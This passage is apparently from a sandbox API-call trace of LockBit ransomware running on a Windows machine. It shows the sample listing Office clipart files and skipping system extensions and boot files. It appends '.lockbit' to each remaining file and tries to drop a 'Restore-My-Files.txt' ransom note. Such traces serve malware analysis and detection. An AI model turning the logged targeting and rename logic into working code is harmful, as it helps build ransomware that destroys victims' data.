Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.423] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.423] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.424] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5636ddf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2168, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107258.WMF", cAlternateFileName="")) returned 1 [0141.424] lstrcmpiW (lpString1=".", lpString2="J0107258.WMF") returned -1 [0141.424] lstrcmpiW (lpString1="..", lpString2="J0107258.WMF") returned -1 [0141.424] PathFindExtensionW (pszPath="J0107258.WMF") returned=".WMF" [0141.424] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.424] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.424] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.424] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.424] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.424] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.424] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.424] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.424] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.424] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.424] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.424] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.424] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.424] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.424] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.425] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.425] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.425] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.425] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.425] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.425] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.425] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.425] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.425] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.425] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.425] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.425] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.425] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.425] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.425] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.425] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.425] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.425] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.425] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.426] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.426] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.426] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.426] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.426] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.426] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.426] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.426] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.426] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.426] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.426] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.426] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.426] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.426] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107258.WMF") returned 1 [0141.426] lstrcmpiW (lpString1="ntldr", lpString2="J0107258.WMF") returned 1 [0141.426] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107258.WMF") returned 1 [0141.426] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107258.WMF") returned -1 [0141.426] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107258.WMF") returned -1 [0141.426] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107258.WMF") returned 1 [0141.426] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107258.WMF") returned -1 [0141.426] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.427] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF") returned=".WMF" [0141.427] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.427] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.427] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.427] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.427] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.427] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.427] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.427] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.427] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.427] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.427] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.427] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.427] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.427] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.427] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.427] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.427] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.427] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.427] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.427] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.427] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.428] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.428] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.428] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.428] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.428] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.428] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.428] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.428] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF.lockbit") returned 72 [0141.428] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107258.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0141.430] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.430] malloc (_Size=0x40068) returned 0x3df0008 [0141.430] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8552) returned 1 [0141.430] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.431] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.431] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.432] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.432] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.436] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.436] malloc (_Size=0xa6) returned 0x77d7a8 [0141.437] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0141.438] free (_Block=0x77d7a8) [0141.438] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.438] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.438] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.438] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e8eef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1f3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107262.WMF", cAlternateFileName="")) returned 1 [0141.438] lstrcmpiW (lpString1=".", lpString2="J0107262.WMF") returned -1 [0141.438] lstrcmpiW (lpString1="..", lpString2="J0107262.WMF") returned -1 [0141.438] PathFindExtensionW (pszPath="J0107262.WMF") returned=".WMF" [0141.438] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.438] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.438] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.438] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.438] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.438] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.438] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.439] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.439] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.440] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.440] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.440] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.440] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.440] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.440] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.440] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.440] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.440] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.440] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.440] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.440] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.440] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.440] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.440] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.440] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107262.WMF") returned 1 [0141.440] lstrcmpiW (lpString1="ntldr", lpString2="J0107262.WMF") returned 1 [0141.440] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107262.WMF") returned 1 [0141.440] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107262.WMF") returned -1 [0141.440] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107262.WMF") returned -1 [0141.440] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107262.WMF") returned 1 [0141.440] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107262.WMF") returned -1 [0141.440] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.440] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF") returned=".WMF" [0141.440] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.440] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.440] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.441] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.441] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF.lockbit") returned 72 [0141.441] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107262.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0141.442] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.442] malloc (_Size=0x40068) returned 0x3df0008 [0141.443] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7996) returned 1 [0141.443] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.443] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.443] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.444] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.444] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.449] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.449] malloc (_Size=0xa6) returned 0x77d7a8 [0141.449] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0141.450] free (_Block=0x77d7a8) [0141.450] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.450] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.450] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.450] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1498, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107264.WMF", cAlternateFileName="")) returned 1 [0141.450] lstrcmpiW (lpString1=".", lpString2="J0107264.WMF") returned -1 [0141.451] lstrcmpiW (lpString1="..", lpString2="J0107264.WMF") returned -1 [0141.451] PathFindExtensionW (pszPath="J0107264.WMF") returned=".WMF" [0141.451] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.451] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.451] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.451] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.451] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.451] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.451] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.451] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.451] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.451] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.451] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.451] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.451] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.451] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.451] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.451] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.452] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.452] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.453] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.453] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.453] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.453] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.453] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.453] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107264.WMF") returned 1 [0141.453] lstrcmpiW (lpString1="ntldr", lpString2="J0107264.WMF") returned 1 [0141.453] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107264.WMF") returned 1 [0141.453] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107264.WMF") returned -1 [0141.453] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107264.WMF") returned -1 [0141.453] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107264.WMF") returned 1 [0141.453] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107264.WMF") returned -1 [0141.453] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.453] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned=".WMF" [0141.453] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.453] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.453] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.453] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.453] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.453] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.453] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.453] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.453] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.453] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 